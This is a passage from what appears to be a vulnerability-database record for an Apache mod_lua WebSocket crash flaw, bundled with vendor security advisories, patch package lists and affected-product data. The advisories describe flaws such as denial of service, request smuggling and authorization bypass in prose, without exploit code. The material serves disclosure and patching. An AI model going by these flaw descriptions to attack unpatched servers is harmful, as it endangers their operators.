"JVNDB-2016-003987", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-821", }, { date: "2016-07-21T10:15:13.677000", db: "NVD", id: "CVE-2016-5457", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: 
"VHN-94276", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5457", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91995", }, { date: "2016-07-28T00:00:00", db: "JVNDB", id: "JVNDB-2016-003987", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-821", }, { date: "2024-11-21T02:54:21.373000", db: "NVD", id: "CVE-2016-5457", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In LUMAIN Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003987", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, ], trust: 0.6, }, }
var-201503-0050
Vulnerability from variot
The lua_websocket_read function in lua_request.c in the mod_lua module in the Apache HTTP Server through 2.4.12 allows remote attackers to cause a denial of service (child-process crash) by sending a crafted WebSocket Ping frame after a Lua script has called the wsupgrade function. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare 
Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Apache HTTP Server is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to trigger denial-of-service conditions. Versions prior to Apache HTTP Server 2.4.13 are vulnerable. The server is fast, reliable and extensible through a simple API. ============================================================================ Ubuntu Security Notice USN-2523-1 March 10, 2015
apache2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in the Apache HTTP Server. The issue tracked as CVE-2014-3581 only affected Ubuntu 14.04 LTS and Ubuntu 14.10.
Teguh P. Alko discovered that the mod_proxy_fcgi module incorrectly handled long response headers. This issue only affected Ubuntu 14.10. (CVE-2014-3583)
It was discovered that the mod_lua module incorrectly handled different arguments within different contexts. This issue only affected Ubuntu 14.10. (CVE-2014-8109)
Guido Vranken discovered that the mod_lua module incorrectly handled a specially crafted websocket PING in certain circumstances. This issue only affected Ubuntu 14.10. (CVE-2015-0228)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: apache2.2-bin 2.4.10-1ubuntu1.1
Ubuntu 14.04 LTS: apache2.2-bin 2.4.7-1ubuntu4.4
Ubuntu 12.04 LTS: apache2.2-bin 2.2.22-1ubuntu1.8
Ubuntu 10.04 LTS: apache2.2-bin 2.2.14-5ubuntu8.15
In general, a standard system update will make all the necessary changes.
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module.
mod_lua.c in the mod_lua module in the Apache HTTP Server through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory (CVE-2014-8109). A malicious client could use Trailer headers to set additional HTTP headers after header processing was performed by other modules. This could, for example, lead to a bypass of header restrictions defined with mod_headers (CVE-2013-5704).
Note: With this update, httpd has been modified to not merge HTTP Trailer headers with other HTTP request headers. A newly introduced configuration directive MergeTrailers can be used to re-enable the old method of processing Trailer headers, which also re-introduces the aforementioned flaw.
This update also fixes the following bug:
Prior to this update, the mod_proxy_wstunnel module failed to set up an SSL connection when configured to use a back end server using the wss: URL scheme, causing proxied connections to fail. In these updated packages, SSL is used when proxying to wss: back end servers (rhbz#1141950). The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing the command below. The command identifies the key by a short 32-bit key ID, and short IDs are not unique, so compare the full fingerprint of the retrieved key against a trusted copy before relying on it:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFnRImqjQ0CJFipgRAhbAAKDF22tbaWSxzaiqvhq0t6uM1bwWvgCfVNIJ 7XU6s8wMPlxQucpKSIVIKYI= =4uS5 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: httpd24-httpd security update Advisory ID: RHSA-2015:1666-01 Product: Red Hat Software Collections Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1666.html Issue date: 2015-08-24 CVE Names: CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 CVE-2015-3185 =====================================================================
- Summary:
Updated httpd24-httpd packages that fix multiple security issues are now available for Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3183)
It was discovered that in httpd 2.4, the internal API function ap_some_auth_required() could incorrectly indicate that a request was authenticated even when no authentication was used. An httpd module using this API function could consequently allow access that should have been denied. (CVE-2015-3185)
Note: This update introduces a new API function, ap_some_authn_required(), which correctly indicates if a request is authenticated. External httpd modules using the old API function should be modified to use the new one to completely resolve this issue.
A denial of service flaw was found in the way the mod_lua httpd module processed certain WebSocket Ping requests. (CVE-2015-0228)
A NULL pointer dereference flaw was found in the way httpd generated certain error responses. A remote attacker could possibly use this flaw to crash the httpd child process using a request that triggers a certain HTTP error. (CVE-2015-0253)
All httpd24-httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd24-httpd service will be restarted automatically.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1202988 - CVE-2015-0228 httpd: Possible mod_lua crash due to websocket bug 1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser 1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4 1243891 - CVE-2015-0253 httpd: NULL pointer dereference crash with ErrorDocument 400 pointing to a local URL-path
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: httpd24-httpd-2.4.12-6.el7.1.src.rpm
noarch: httpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm
x86_64: httpd24-httpd-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):
Source: httpd24-httpd-2.4.12-6.el7.1.src.rpm
noarch: httpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm
x86_64: httpd24-httpd-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: httpd24-httpd-2.4.12-6.el7.1.src.rpm
noarch: httpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm
x86_64: httpd24-httpd-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-0228 https://access.redhat.com/security/cve/CVE-2015-0253 https://access.redhat.com/security/cve/CVE-2015-3183 https://access.redhat.com/security/cve/CVE-2015-3185 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFV22bPXlSAg2UNWIIRAmm2AKCI6AByn1Zlj/2R8aLKFD4hZno5VgCfcx8H y5DWl0MjeqKeAOHiddwyDdU= =yzQP -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . These issues were addressed by updating Apache to version 2.4.16. CVE-ID CVE-2013-5704 CVE-2014-3581 CVE-2014-3583 CVE-2014-8109 CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 CVE-2015-3185
BIND Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilities in BIND, the most severe of which may allow a remote attacker to cause a denial of service Description: Multiple vulnerabilities existed in BIND versions prior to 9.9.7. These issues were addressed by updating BIND to version 9.9.7. CVE-ID CVE-2014-8500 CVE-2015-1349
PostgreSQL Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilities in PostgreSQL, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in PostgreSQL versions prior to 9.3.9. These issues were addressed by updating PostgreSQL to version 9.3.9. CVE-ID CVE-2014-0067 CVE-2014-8161 CVE-2015-0241 CVE-2015-0242 CVE-2015-0243 CVE-2015-0244 CVE-2015-3165 CVE-2015-3166 CVE-2015-3167
Wiki Server Available for: OS X Yosemite v10.10.4 or later Impact: Multiple XML security issues in Wiki Server Description: Multiple XML vulnerabilities existed in Wiki Server based on Twisted. This issue was addressed by removing Twisted. CVE-ID CVE-2015-5911 : Zachary Jones of WhiteHat Security Threat Research Center
OS X Server 5.0.3 may be obtained from the Mac App Store.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/httpd-2.4.16-i486-1_slack14.1.txz: Upgraded. This update fixes the following security issues: * CVE-2015-0253: Fix a crash with ErrorDocument 400 pointing to a local URL-path with the INCLUDES filter active, introduced in 2.4.11. * CVE-2015-3183: core: Fix chunk header parsing defect. Remove apr_brigade_flatten(), buffering and duplicated code from the HTTP_IN filter, parse chunks in a single pass with zero copy. Limit accepted chunk-size to 2^63-1 and be strict about chunk-ext authorized characters. * CVE-2015-3185: Replacement of ap_some_auth_required (unusable in Apache httpd 2.4) with new ap_some_authn_required and ap_force_authn hook. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0253 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3185 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.16-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.16-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.16-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.16-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.16-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.16-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: d78c9925e69ba6ce14d67fb67245981b httpd-2.4.16-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 1370e3c7e135bf07b65e73049099a942 httpd-2.4.16-x86_64-1_slack14.0.txz
Slackware 14.1 package: ea116c45bba8c80f59cfe0394a8f87fa httpd-2.4.16-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 8b5b1caa1fa203b07b529f77834fac16 httpd-2.4.16-x86_64-1_slack14.1.txz
Slackware -current package: 01ccb961f17bd14c1d157892af4c9f1d n/httpd-2.4.16-i586-1.txz
Slackware x86_64 -current package: 70a6644de3585007861e57cf08608843 n/httpd-2.4.16-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg httpd-2.4.16-i486-1_slack14.1.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0050", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "http server", scope: "lte", trust: 1.8, vendor: "apache", version: "2.4.12", }, { model: "mac os x server", scope: "eq", trust: 1.6, vendor: "apple", version: "5.0.3", }, { model: "mac os x", scope: "eq", trust: 1.6, vendor: "apple", version: "10.10.4", }, { model: "enterprise 
manager ops center", scope: "eq", trust: 1.4, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.4, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.4, vendor: "oracle", version: "12.1.4", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "12.04", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "14.10", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "10.04", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "14.04", }, { model: "opensuse", scope: "eq", trust: 1, vendor: "opensuse", version: "13.2", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "mac os x", scope: "eq", trust: 0.8, vendor: "apple", version: "10.10 to 10.10.4", }, { model: "mac os x", scope: "eq", trust: 0.8, vendor: "apple", version: "10.9.5", }, { model: "macos server", scope: "lt", trust: 0.8, vendor: "apple", version: "5.0.3 (os x yosemite v10.10.5 or later )", }, { model: "opensuse", scope: "eq", trust: 0.6, vendor: "novell", version: "13.2", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband 
gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", 